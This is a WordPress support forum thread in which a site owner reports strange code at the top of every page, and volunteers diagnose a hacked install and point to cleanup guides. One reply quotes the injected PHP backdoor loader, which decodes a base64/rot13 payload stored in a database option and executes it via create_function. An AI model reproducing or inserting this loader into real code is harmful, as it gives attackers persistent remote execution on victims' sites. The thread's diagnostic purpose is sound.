Code at top of every page

  • Resolved politicalrelief

    (@politicalrelief)


    12 years, 8 months ago

    Forty lines or so of code are appearing at the top of every one of my pages. It’s also appearing in my dashboard/settings, where all formatting and css is also removed. The site is http://politicalrelief.com

    I disabled all plugins, which didn’t solve the problem. I can’t point to any editing which may have caused the problem, as the last time I made any changes the site looked fine, and when I returned today, this strange code has appeared.

    Another user seemed to have a similar problem, and found some extraneous code in the header file, but if that’s the problem here I don’t know how to identify it.

    Any thoughts? Thanks!

Viewing 10 replies - 1 through 10 (of 10 total)
  • esmi

    (@esmi)

    12 years, 8 months ago

    Have you tried:

    – switching to the default theme to rule out any theme-specific problems.

    resetting the plugins folder by FTP or PhpMyAdmin. Sometimes, an apparently inactive plugin can still cause problems.

    Thread Starter politicalrelief

    (@politicalrelief)

    12 years, 8 months ago

    I did try changing themes, but that didn’t solve it.

    I did use ftp to move the plugins to another folder, created a new empty plugin folder. Didn’t work either.

    Strangely, now I can’t access my admin page at all anymore, it shows only the strange code and nothing else.

    Puzzling.

    sijo55

    (@sijo55)

    12 years, 8 months ago

    There seems to be some code breaking the <?php tag:

    <
;$z=get_option("_transient_feed_947543a8084c67f0ea2db7eeed06677f"); $z=base64_decode(str_rot13($z)); if(strpos($z,"F6AFF7C3")!==false){ $_z=create_function("",$z); @$_z(); }
?php
/**
 * Sets up the default filters and actions for most
 * of the WordPress hooks.

    You could search your files with grep to find this..

    esmi

    (@esmi)

    12 years, 8 months ago

    Try re-uploading the wp-includes folder from a fresh download of your version of WordPress.

    Thread Starter politicalrelief

    (@politicalrelief)

    12 years, 8 months ago

    Sijo55,

    If I found it, I wouldn’t know which part of the code was wrong!

    Thread Starter politicalrelief

    (@politicalrelief)

    12 years, 8 months ago

    Esmi,

    I used ftp to download the wp-includes folder, deleted same folder from the server, then re-uploaded it from my hard drive. Is that what you meant? Unfortunately it didn’t change anything. And I’m still unable to access my admin panel.

    esmi

    (@esmi)

    12 years, 8 months ago

    Is that what you meant?

    Was that from a fresh download of your version of WordPress from wordpress.org? Because those lines of code are from a file in the wp-includes folder which looks like it may have been damaged. A fresh upload should have rectified it.

    esmi

    (@esmi)

    12 years, 8 months ago

    I’ve just had another look at the code that is being displayed (I only searched on the last two lines) and I’m pretty sure your site has been hacked. 🙁 Sorry – I should have picked that up sooner. Anything that includes base64_decode should be treated with the utmost suspicion. Have a look at these help resources:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Thread Starter politicalrelief

    (@politicalrelief)

    12 years, 8 months ago

    Ugh, thanks for the heads up Esmi. I’m in the process of re-uploading my wp-includes folder, I didn’t realize what you meant at first by a fresh upload.
    The first thing I tried to do to solve this problem was upgrade wordpress, but it wouldn’t let me because my host doesn’t yet have the right mysql version.
    I’ll start working through the fixes on the pages you linked to.

    esmi

    (@esmi)

    12 years, 8 months ago

    If I’m right and this is a hack, make sure that you read the last link I gave above. You don’t want the hacker coming back in again via a backdoor.

Viewing 10 replies - 1 through 10 (of 10 total)
  • The topic ‘Code at top of every page’ is closed to new replies.